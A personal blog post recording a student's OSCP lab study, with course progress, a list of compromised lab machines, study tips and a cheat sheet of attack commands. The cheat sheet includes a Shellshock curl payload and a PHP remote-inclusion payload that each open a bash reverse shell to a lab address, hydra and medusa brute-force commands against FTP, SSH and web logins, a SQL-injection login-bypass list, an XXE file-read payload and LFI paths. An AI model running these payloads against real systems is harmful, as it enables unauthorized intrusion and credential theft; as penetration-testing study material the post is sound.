OSCP Journey – 1st month

Date: 02 June – 30 aug2019
PDF: 380/380
Videos: 149/149
Exercises: 32/42
Exploited Machines: 33
Unlocked Networks: 2

The PDF contains 380 pages that spread over 18 chapters. The video’s length is around 7 and half hours spread over 149 Videos. I spent around 30 hours doing the materials and exercises. There are five exercises that I decided to do it later since it requires to do it on the correct machines in the lab. The video and PDF fit together but the videos seem outdated and have some differences with the PDF. If you encounter any issues while following the syntax on course materials, use the syntax on the PDF one.

Exploited Machines (33):

ALICE
ALPHA
BETA
BARRY
BETHANY
BOB
BRUCE
BRETT
CORE
CORY
DJ
DOTTY
FC4
GAMMA
HELPDESK
HOTLINE
JD
JOE
KEVIN
KRAKEN
MAIL
MIKE
ORACLE
PAIN
PAYDAY
PHOENIX
RALPH
SEAN [FW-IT]
SHERLOCK
SUFFERANCE
SUSIE
TIMECLOCK [FW-DEV]
TOPHAT

My impression  is its simulates real-world scenario. So far all the exploit is known exploit and no puzzle or random guessing needed. All you need is proper enumeration to spot the vulnerability.

There are four hardest machines in the OSCP lab that known as The Big Four. Those machines are Pain, Sufferance, Gh0st and Humble.

LEARNED:

  • Using up arrow to get previous command in netcat
    – use rlwrap to wrap a readline history library around your netcat program. Another is to use socat which has readline built-in as an option.For example, if you were doing a telnet with netcat you might just say
    c:\PENTEST>revshell 192.168.1.21 9090
root@kali:~/pwk# rlwrap nc -lvp 9090
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 192.168.1.139.
Ncat: Connection from 192.168.1.139:2675.
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\PENTEST>whoami
whoami
LT-JACCO\jacco

COMMANDS:

root@kali:~/pwk# nmap -vv -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi 10.11.x.1-254

root@kali:~/pwk# gobuster -u http://10.11.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -f -s 403

root@kali:~/pwk# dirb http://10.11.x.x/cgi-bin -X .cgi
root@kali:~/pwk# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.x.x:80/cgi-bin/admin.cgi
ATTACK FTP

ftp server :

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 
BRUTE FORCE SSH
hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22:22 - 22 -M ss 
SQL INJECTION
 sheet with the Burp Suite Intruder Module. This list is an extended version of SQL Login Bypass Cheat Sheet of Dr. Emin İslam TatlıIf (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*
XXE
<?xml version="1.0" encoding="UTF-8"?>

 <!DOCTYPE foo [  
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>
LFI

See the source of any php

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index
RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1
') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"
BRUTE FORCE WEB
hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie : PHPSESSID=bq8vrl6updklfdvv21reb8s63j"
htaccess brute force
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10

TIPS:

  • You MUST do the course materials and exercises, it’s a GEM. Even when you already familiar with most of the topics, it will become a refresher. When you attacking machines in the lab it will help you spot the “vulnerability” faster. I think it took around 30-50 hours to complete it. Sparing your time at the beginning for this can save your day later in the lab.
  • In course materials and exercises, some of the tools are outdated and have version issues with Offsec Kali VM. If you encounter any issues, search the problem on the Offsec forum. Most of them are known issues and there are solutions available there.
  • Don’t just do nothing waiting for Nmap scan finish. Make some guess like checking if web service opens using the browser, checking if FTP, SSH or any other common services open using NC and do some manual enumeration while waiting.
  • NMAP Scripts are powerful tools to check for vulnerability. Get familiar with it and play with the scripts. All of the scripts located in /usr/share/nmap/scripts/ directory.
  • Most of the public exploits won’t work without modifying it. It usually has hardcoded IP address and Path. Make sure you understand the exploit and change it as necessary.
  • When compiling exploit, compile it on the environment (OS/kernel) that as close as possible with the target machine. If the target machine didn’t have the compiler, the workaround could be downloading the same OS as target machine, install and compile it there, but it takes a lot of times. I found out that some of Vulnhub VM Machines that similar to OSCP can be used to compile the exploit too. I am using Kioptrix machines to compile the old exploit and it works so far. Saving time on downloading and installing new OS.
  • MSF is a powerful tool even though its restricted in the exam. Use MSF for post-exploitation, it makes your life easier to upload and download the file using Meterpreter shell. It also has many post-exploitation modules that really helpful.
  • For some of the straightforward machines, the methodology is simple: NMAP -> check service or software version for known vulnerability (searchsploit or google) -> read and understand the public exploit code -> make the necessary changes -> exploit.
  • Google anything that you find suspicious or anything that you don’t know at all.
  • Spare your time to make write up after you exploit a machine. It will make you understand better your current methodology and how to improve it. Someday you may also encounter similar machines and it will help you. I use CherryTree for documenting all.

Author: Jacco Straathof

Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *